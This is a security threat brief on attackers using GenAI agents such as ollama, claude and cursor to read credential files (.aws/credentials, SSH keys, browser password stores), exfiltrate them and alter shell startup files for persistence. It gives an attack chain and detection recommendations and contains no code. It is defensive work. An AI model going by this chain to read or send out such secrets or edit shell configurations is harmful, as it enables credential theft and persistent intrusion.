GenAI Tools Accessing Sensitive Files for Credential Access and Persistence
This threat brief details the detection of GenAI tools accessing sensitive files containing credentials, SSH keys, browser data, and shell configurations, indicating potential credential harvesting and persistence attempts by attackers leveraging GenAI agents.
Attackers are increasingly leveraging GenAI agents to automate the discovery and exfiltration of sensitive information, including credentials, API keys, and tokens stored within files on compromised systems. The observed activity involves GenAI tools accessing critical files such as cloud credentials, SSH keys, browser password databases, and shell configuration files. Successful exploitation allows attackers to harvest credentials, gain unauthorized access to systems, and establish persistence mechanisms for continued access. The GenAI tools mentioned include ollama, textgen, lmstudio, claude, cursor, copilot, codex, jan, gpt4all, gemini-cli, genaiscript, grok, qwen, koboldcpp, llama-server, windsurf, zed, opencode, and goose. This activity highlights the emerging threat landscape of AI-assisted attacks and the need for robust detection and mitigation strategies.
Attack Chain
- Initial compromise of a system through an unrelated vulnerability or social engineering.
- Installation or execution of a GenAI tool (e.g., ollama, lmstudio) on the compromised system.
- The GenAI tool is configured or instructed to scan the file system for sensitive files.
- The GenAI tool accesses files containing credentials, such as
.aws/credentials, browser password databases (Login Data,key3.db), or SSH keys (.ssh/id_*). - The GenAI tool exfiltrates the harvested credentials and API keys to a remote server controlled by the attacker.
- The attacker uses the stolen credentials to gain unauthorized access to cloud resources, internal systems, or other sensitive accounts.
- The GenAI tool attempts to modify shell configuration files (e.g.,
.bashrc,.zshrc) to establish persistence. - Upon system restart or user login, the modified shell configuration executes malicious commands, granting the attacker persistent access.
Impact
Successful exploitation of this threat can lead to significant data breaches, unauthorized access to critical systems, and persistent compromise of affected environments. Attackers can leverage stolen credentials to escalate privileges, move laterally within the network, and exfiltrate sensitive data. The number of victims and sectors targeted are currently unknown, but the potential impact is widespread given the increasing adoption of GenAI tools in various industries. Credential theft leads to financial loss, intellectual property theft, and reputational damage.
Recommendation
- Deploy the Sigma rule “GenAI Process Accessing Sensitive Files” to your SIEM to detect GenAI tools accessing sensitive files on endpoints.
- Enable file access monitoring on systems where GenAI tools are used to capture access events for analysis.
- Review and restrict the use of GenAI tools within the environment, especially concerning access to sensitive file paths.
- Monitor for modifications to shell configuration files (e.g.,
.bashrc,.zshrc,.profile) as an indicator of persistence attempts. - Implement regular credential rotation policies to minimize the impact of stolen credentials.
Detection coverage 2
GenAI Process Accessing Sensitive Files
highDetects GenAI tools accessing sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations.
GenAI Process Modifying Shell Configuration Files
mediumDetects GenAI tools writing to shell configuration files, which can indicate persistence attempts.
Detection queries are kept inside the platform. Get full rules →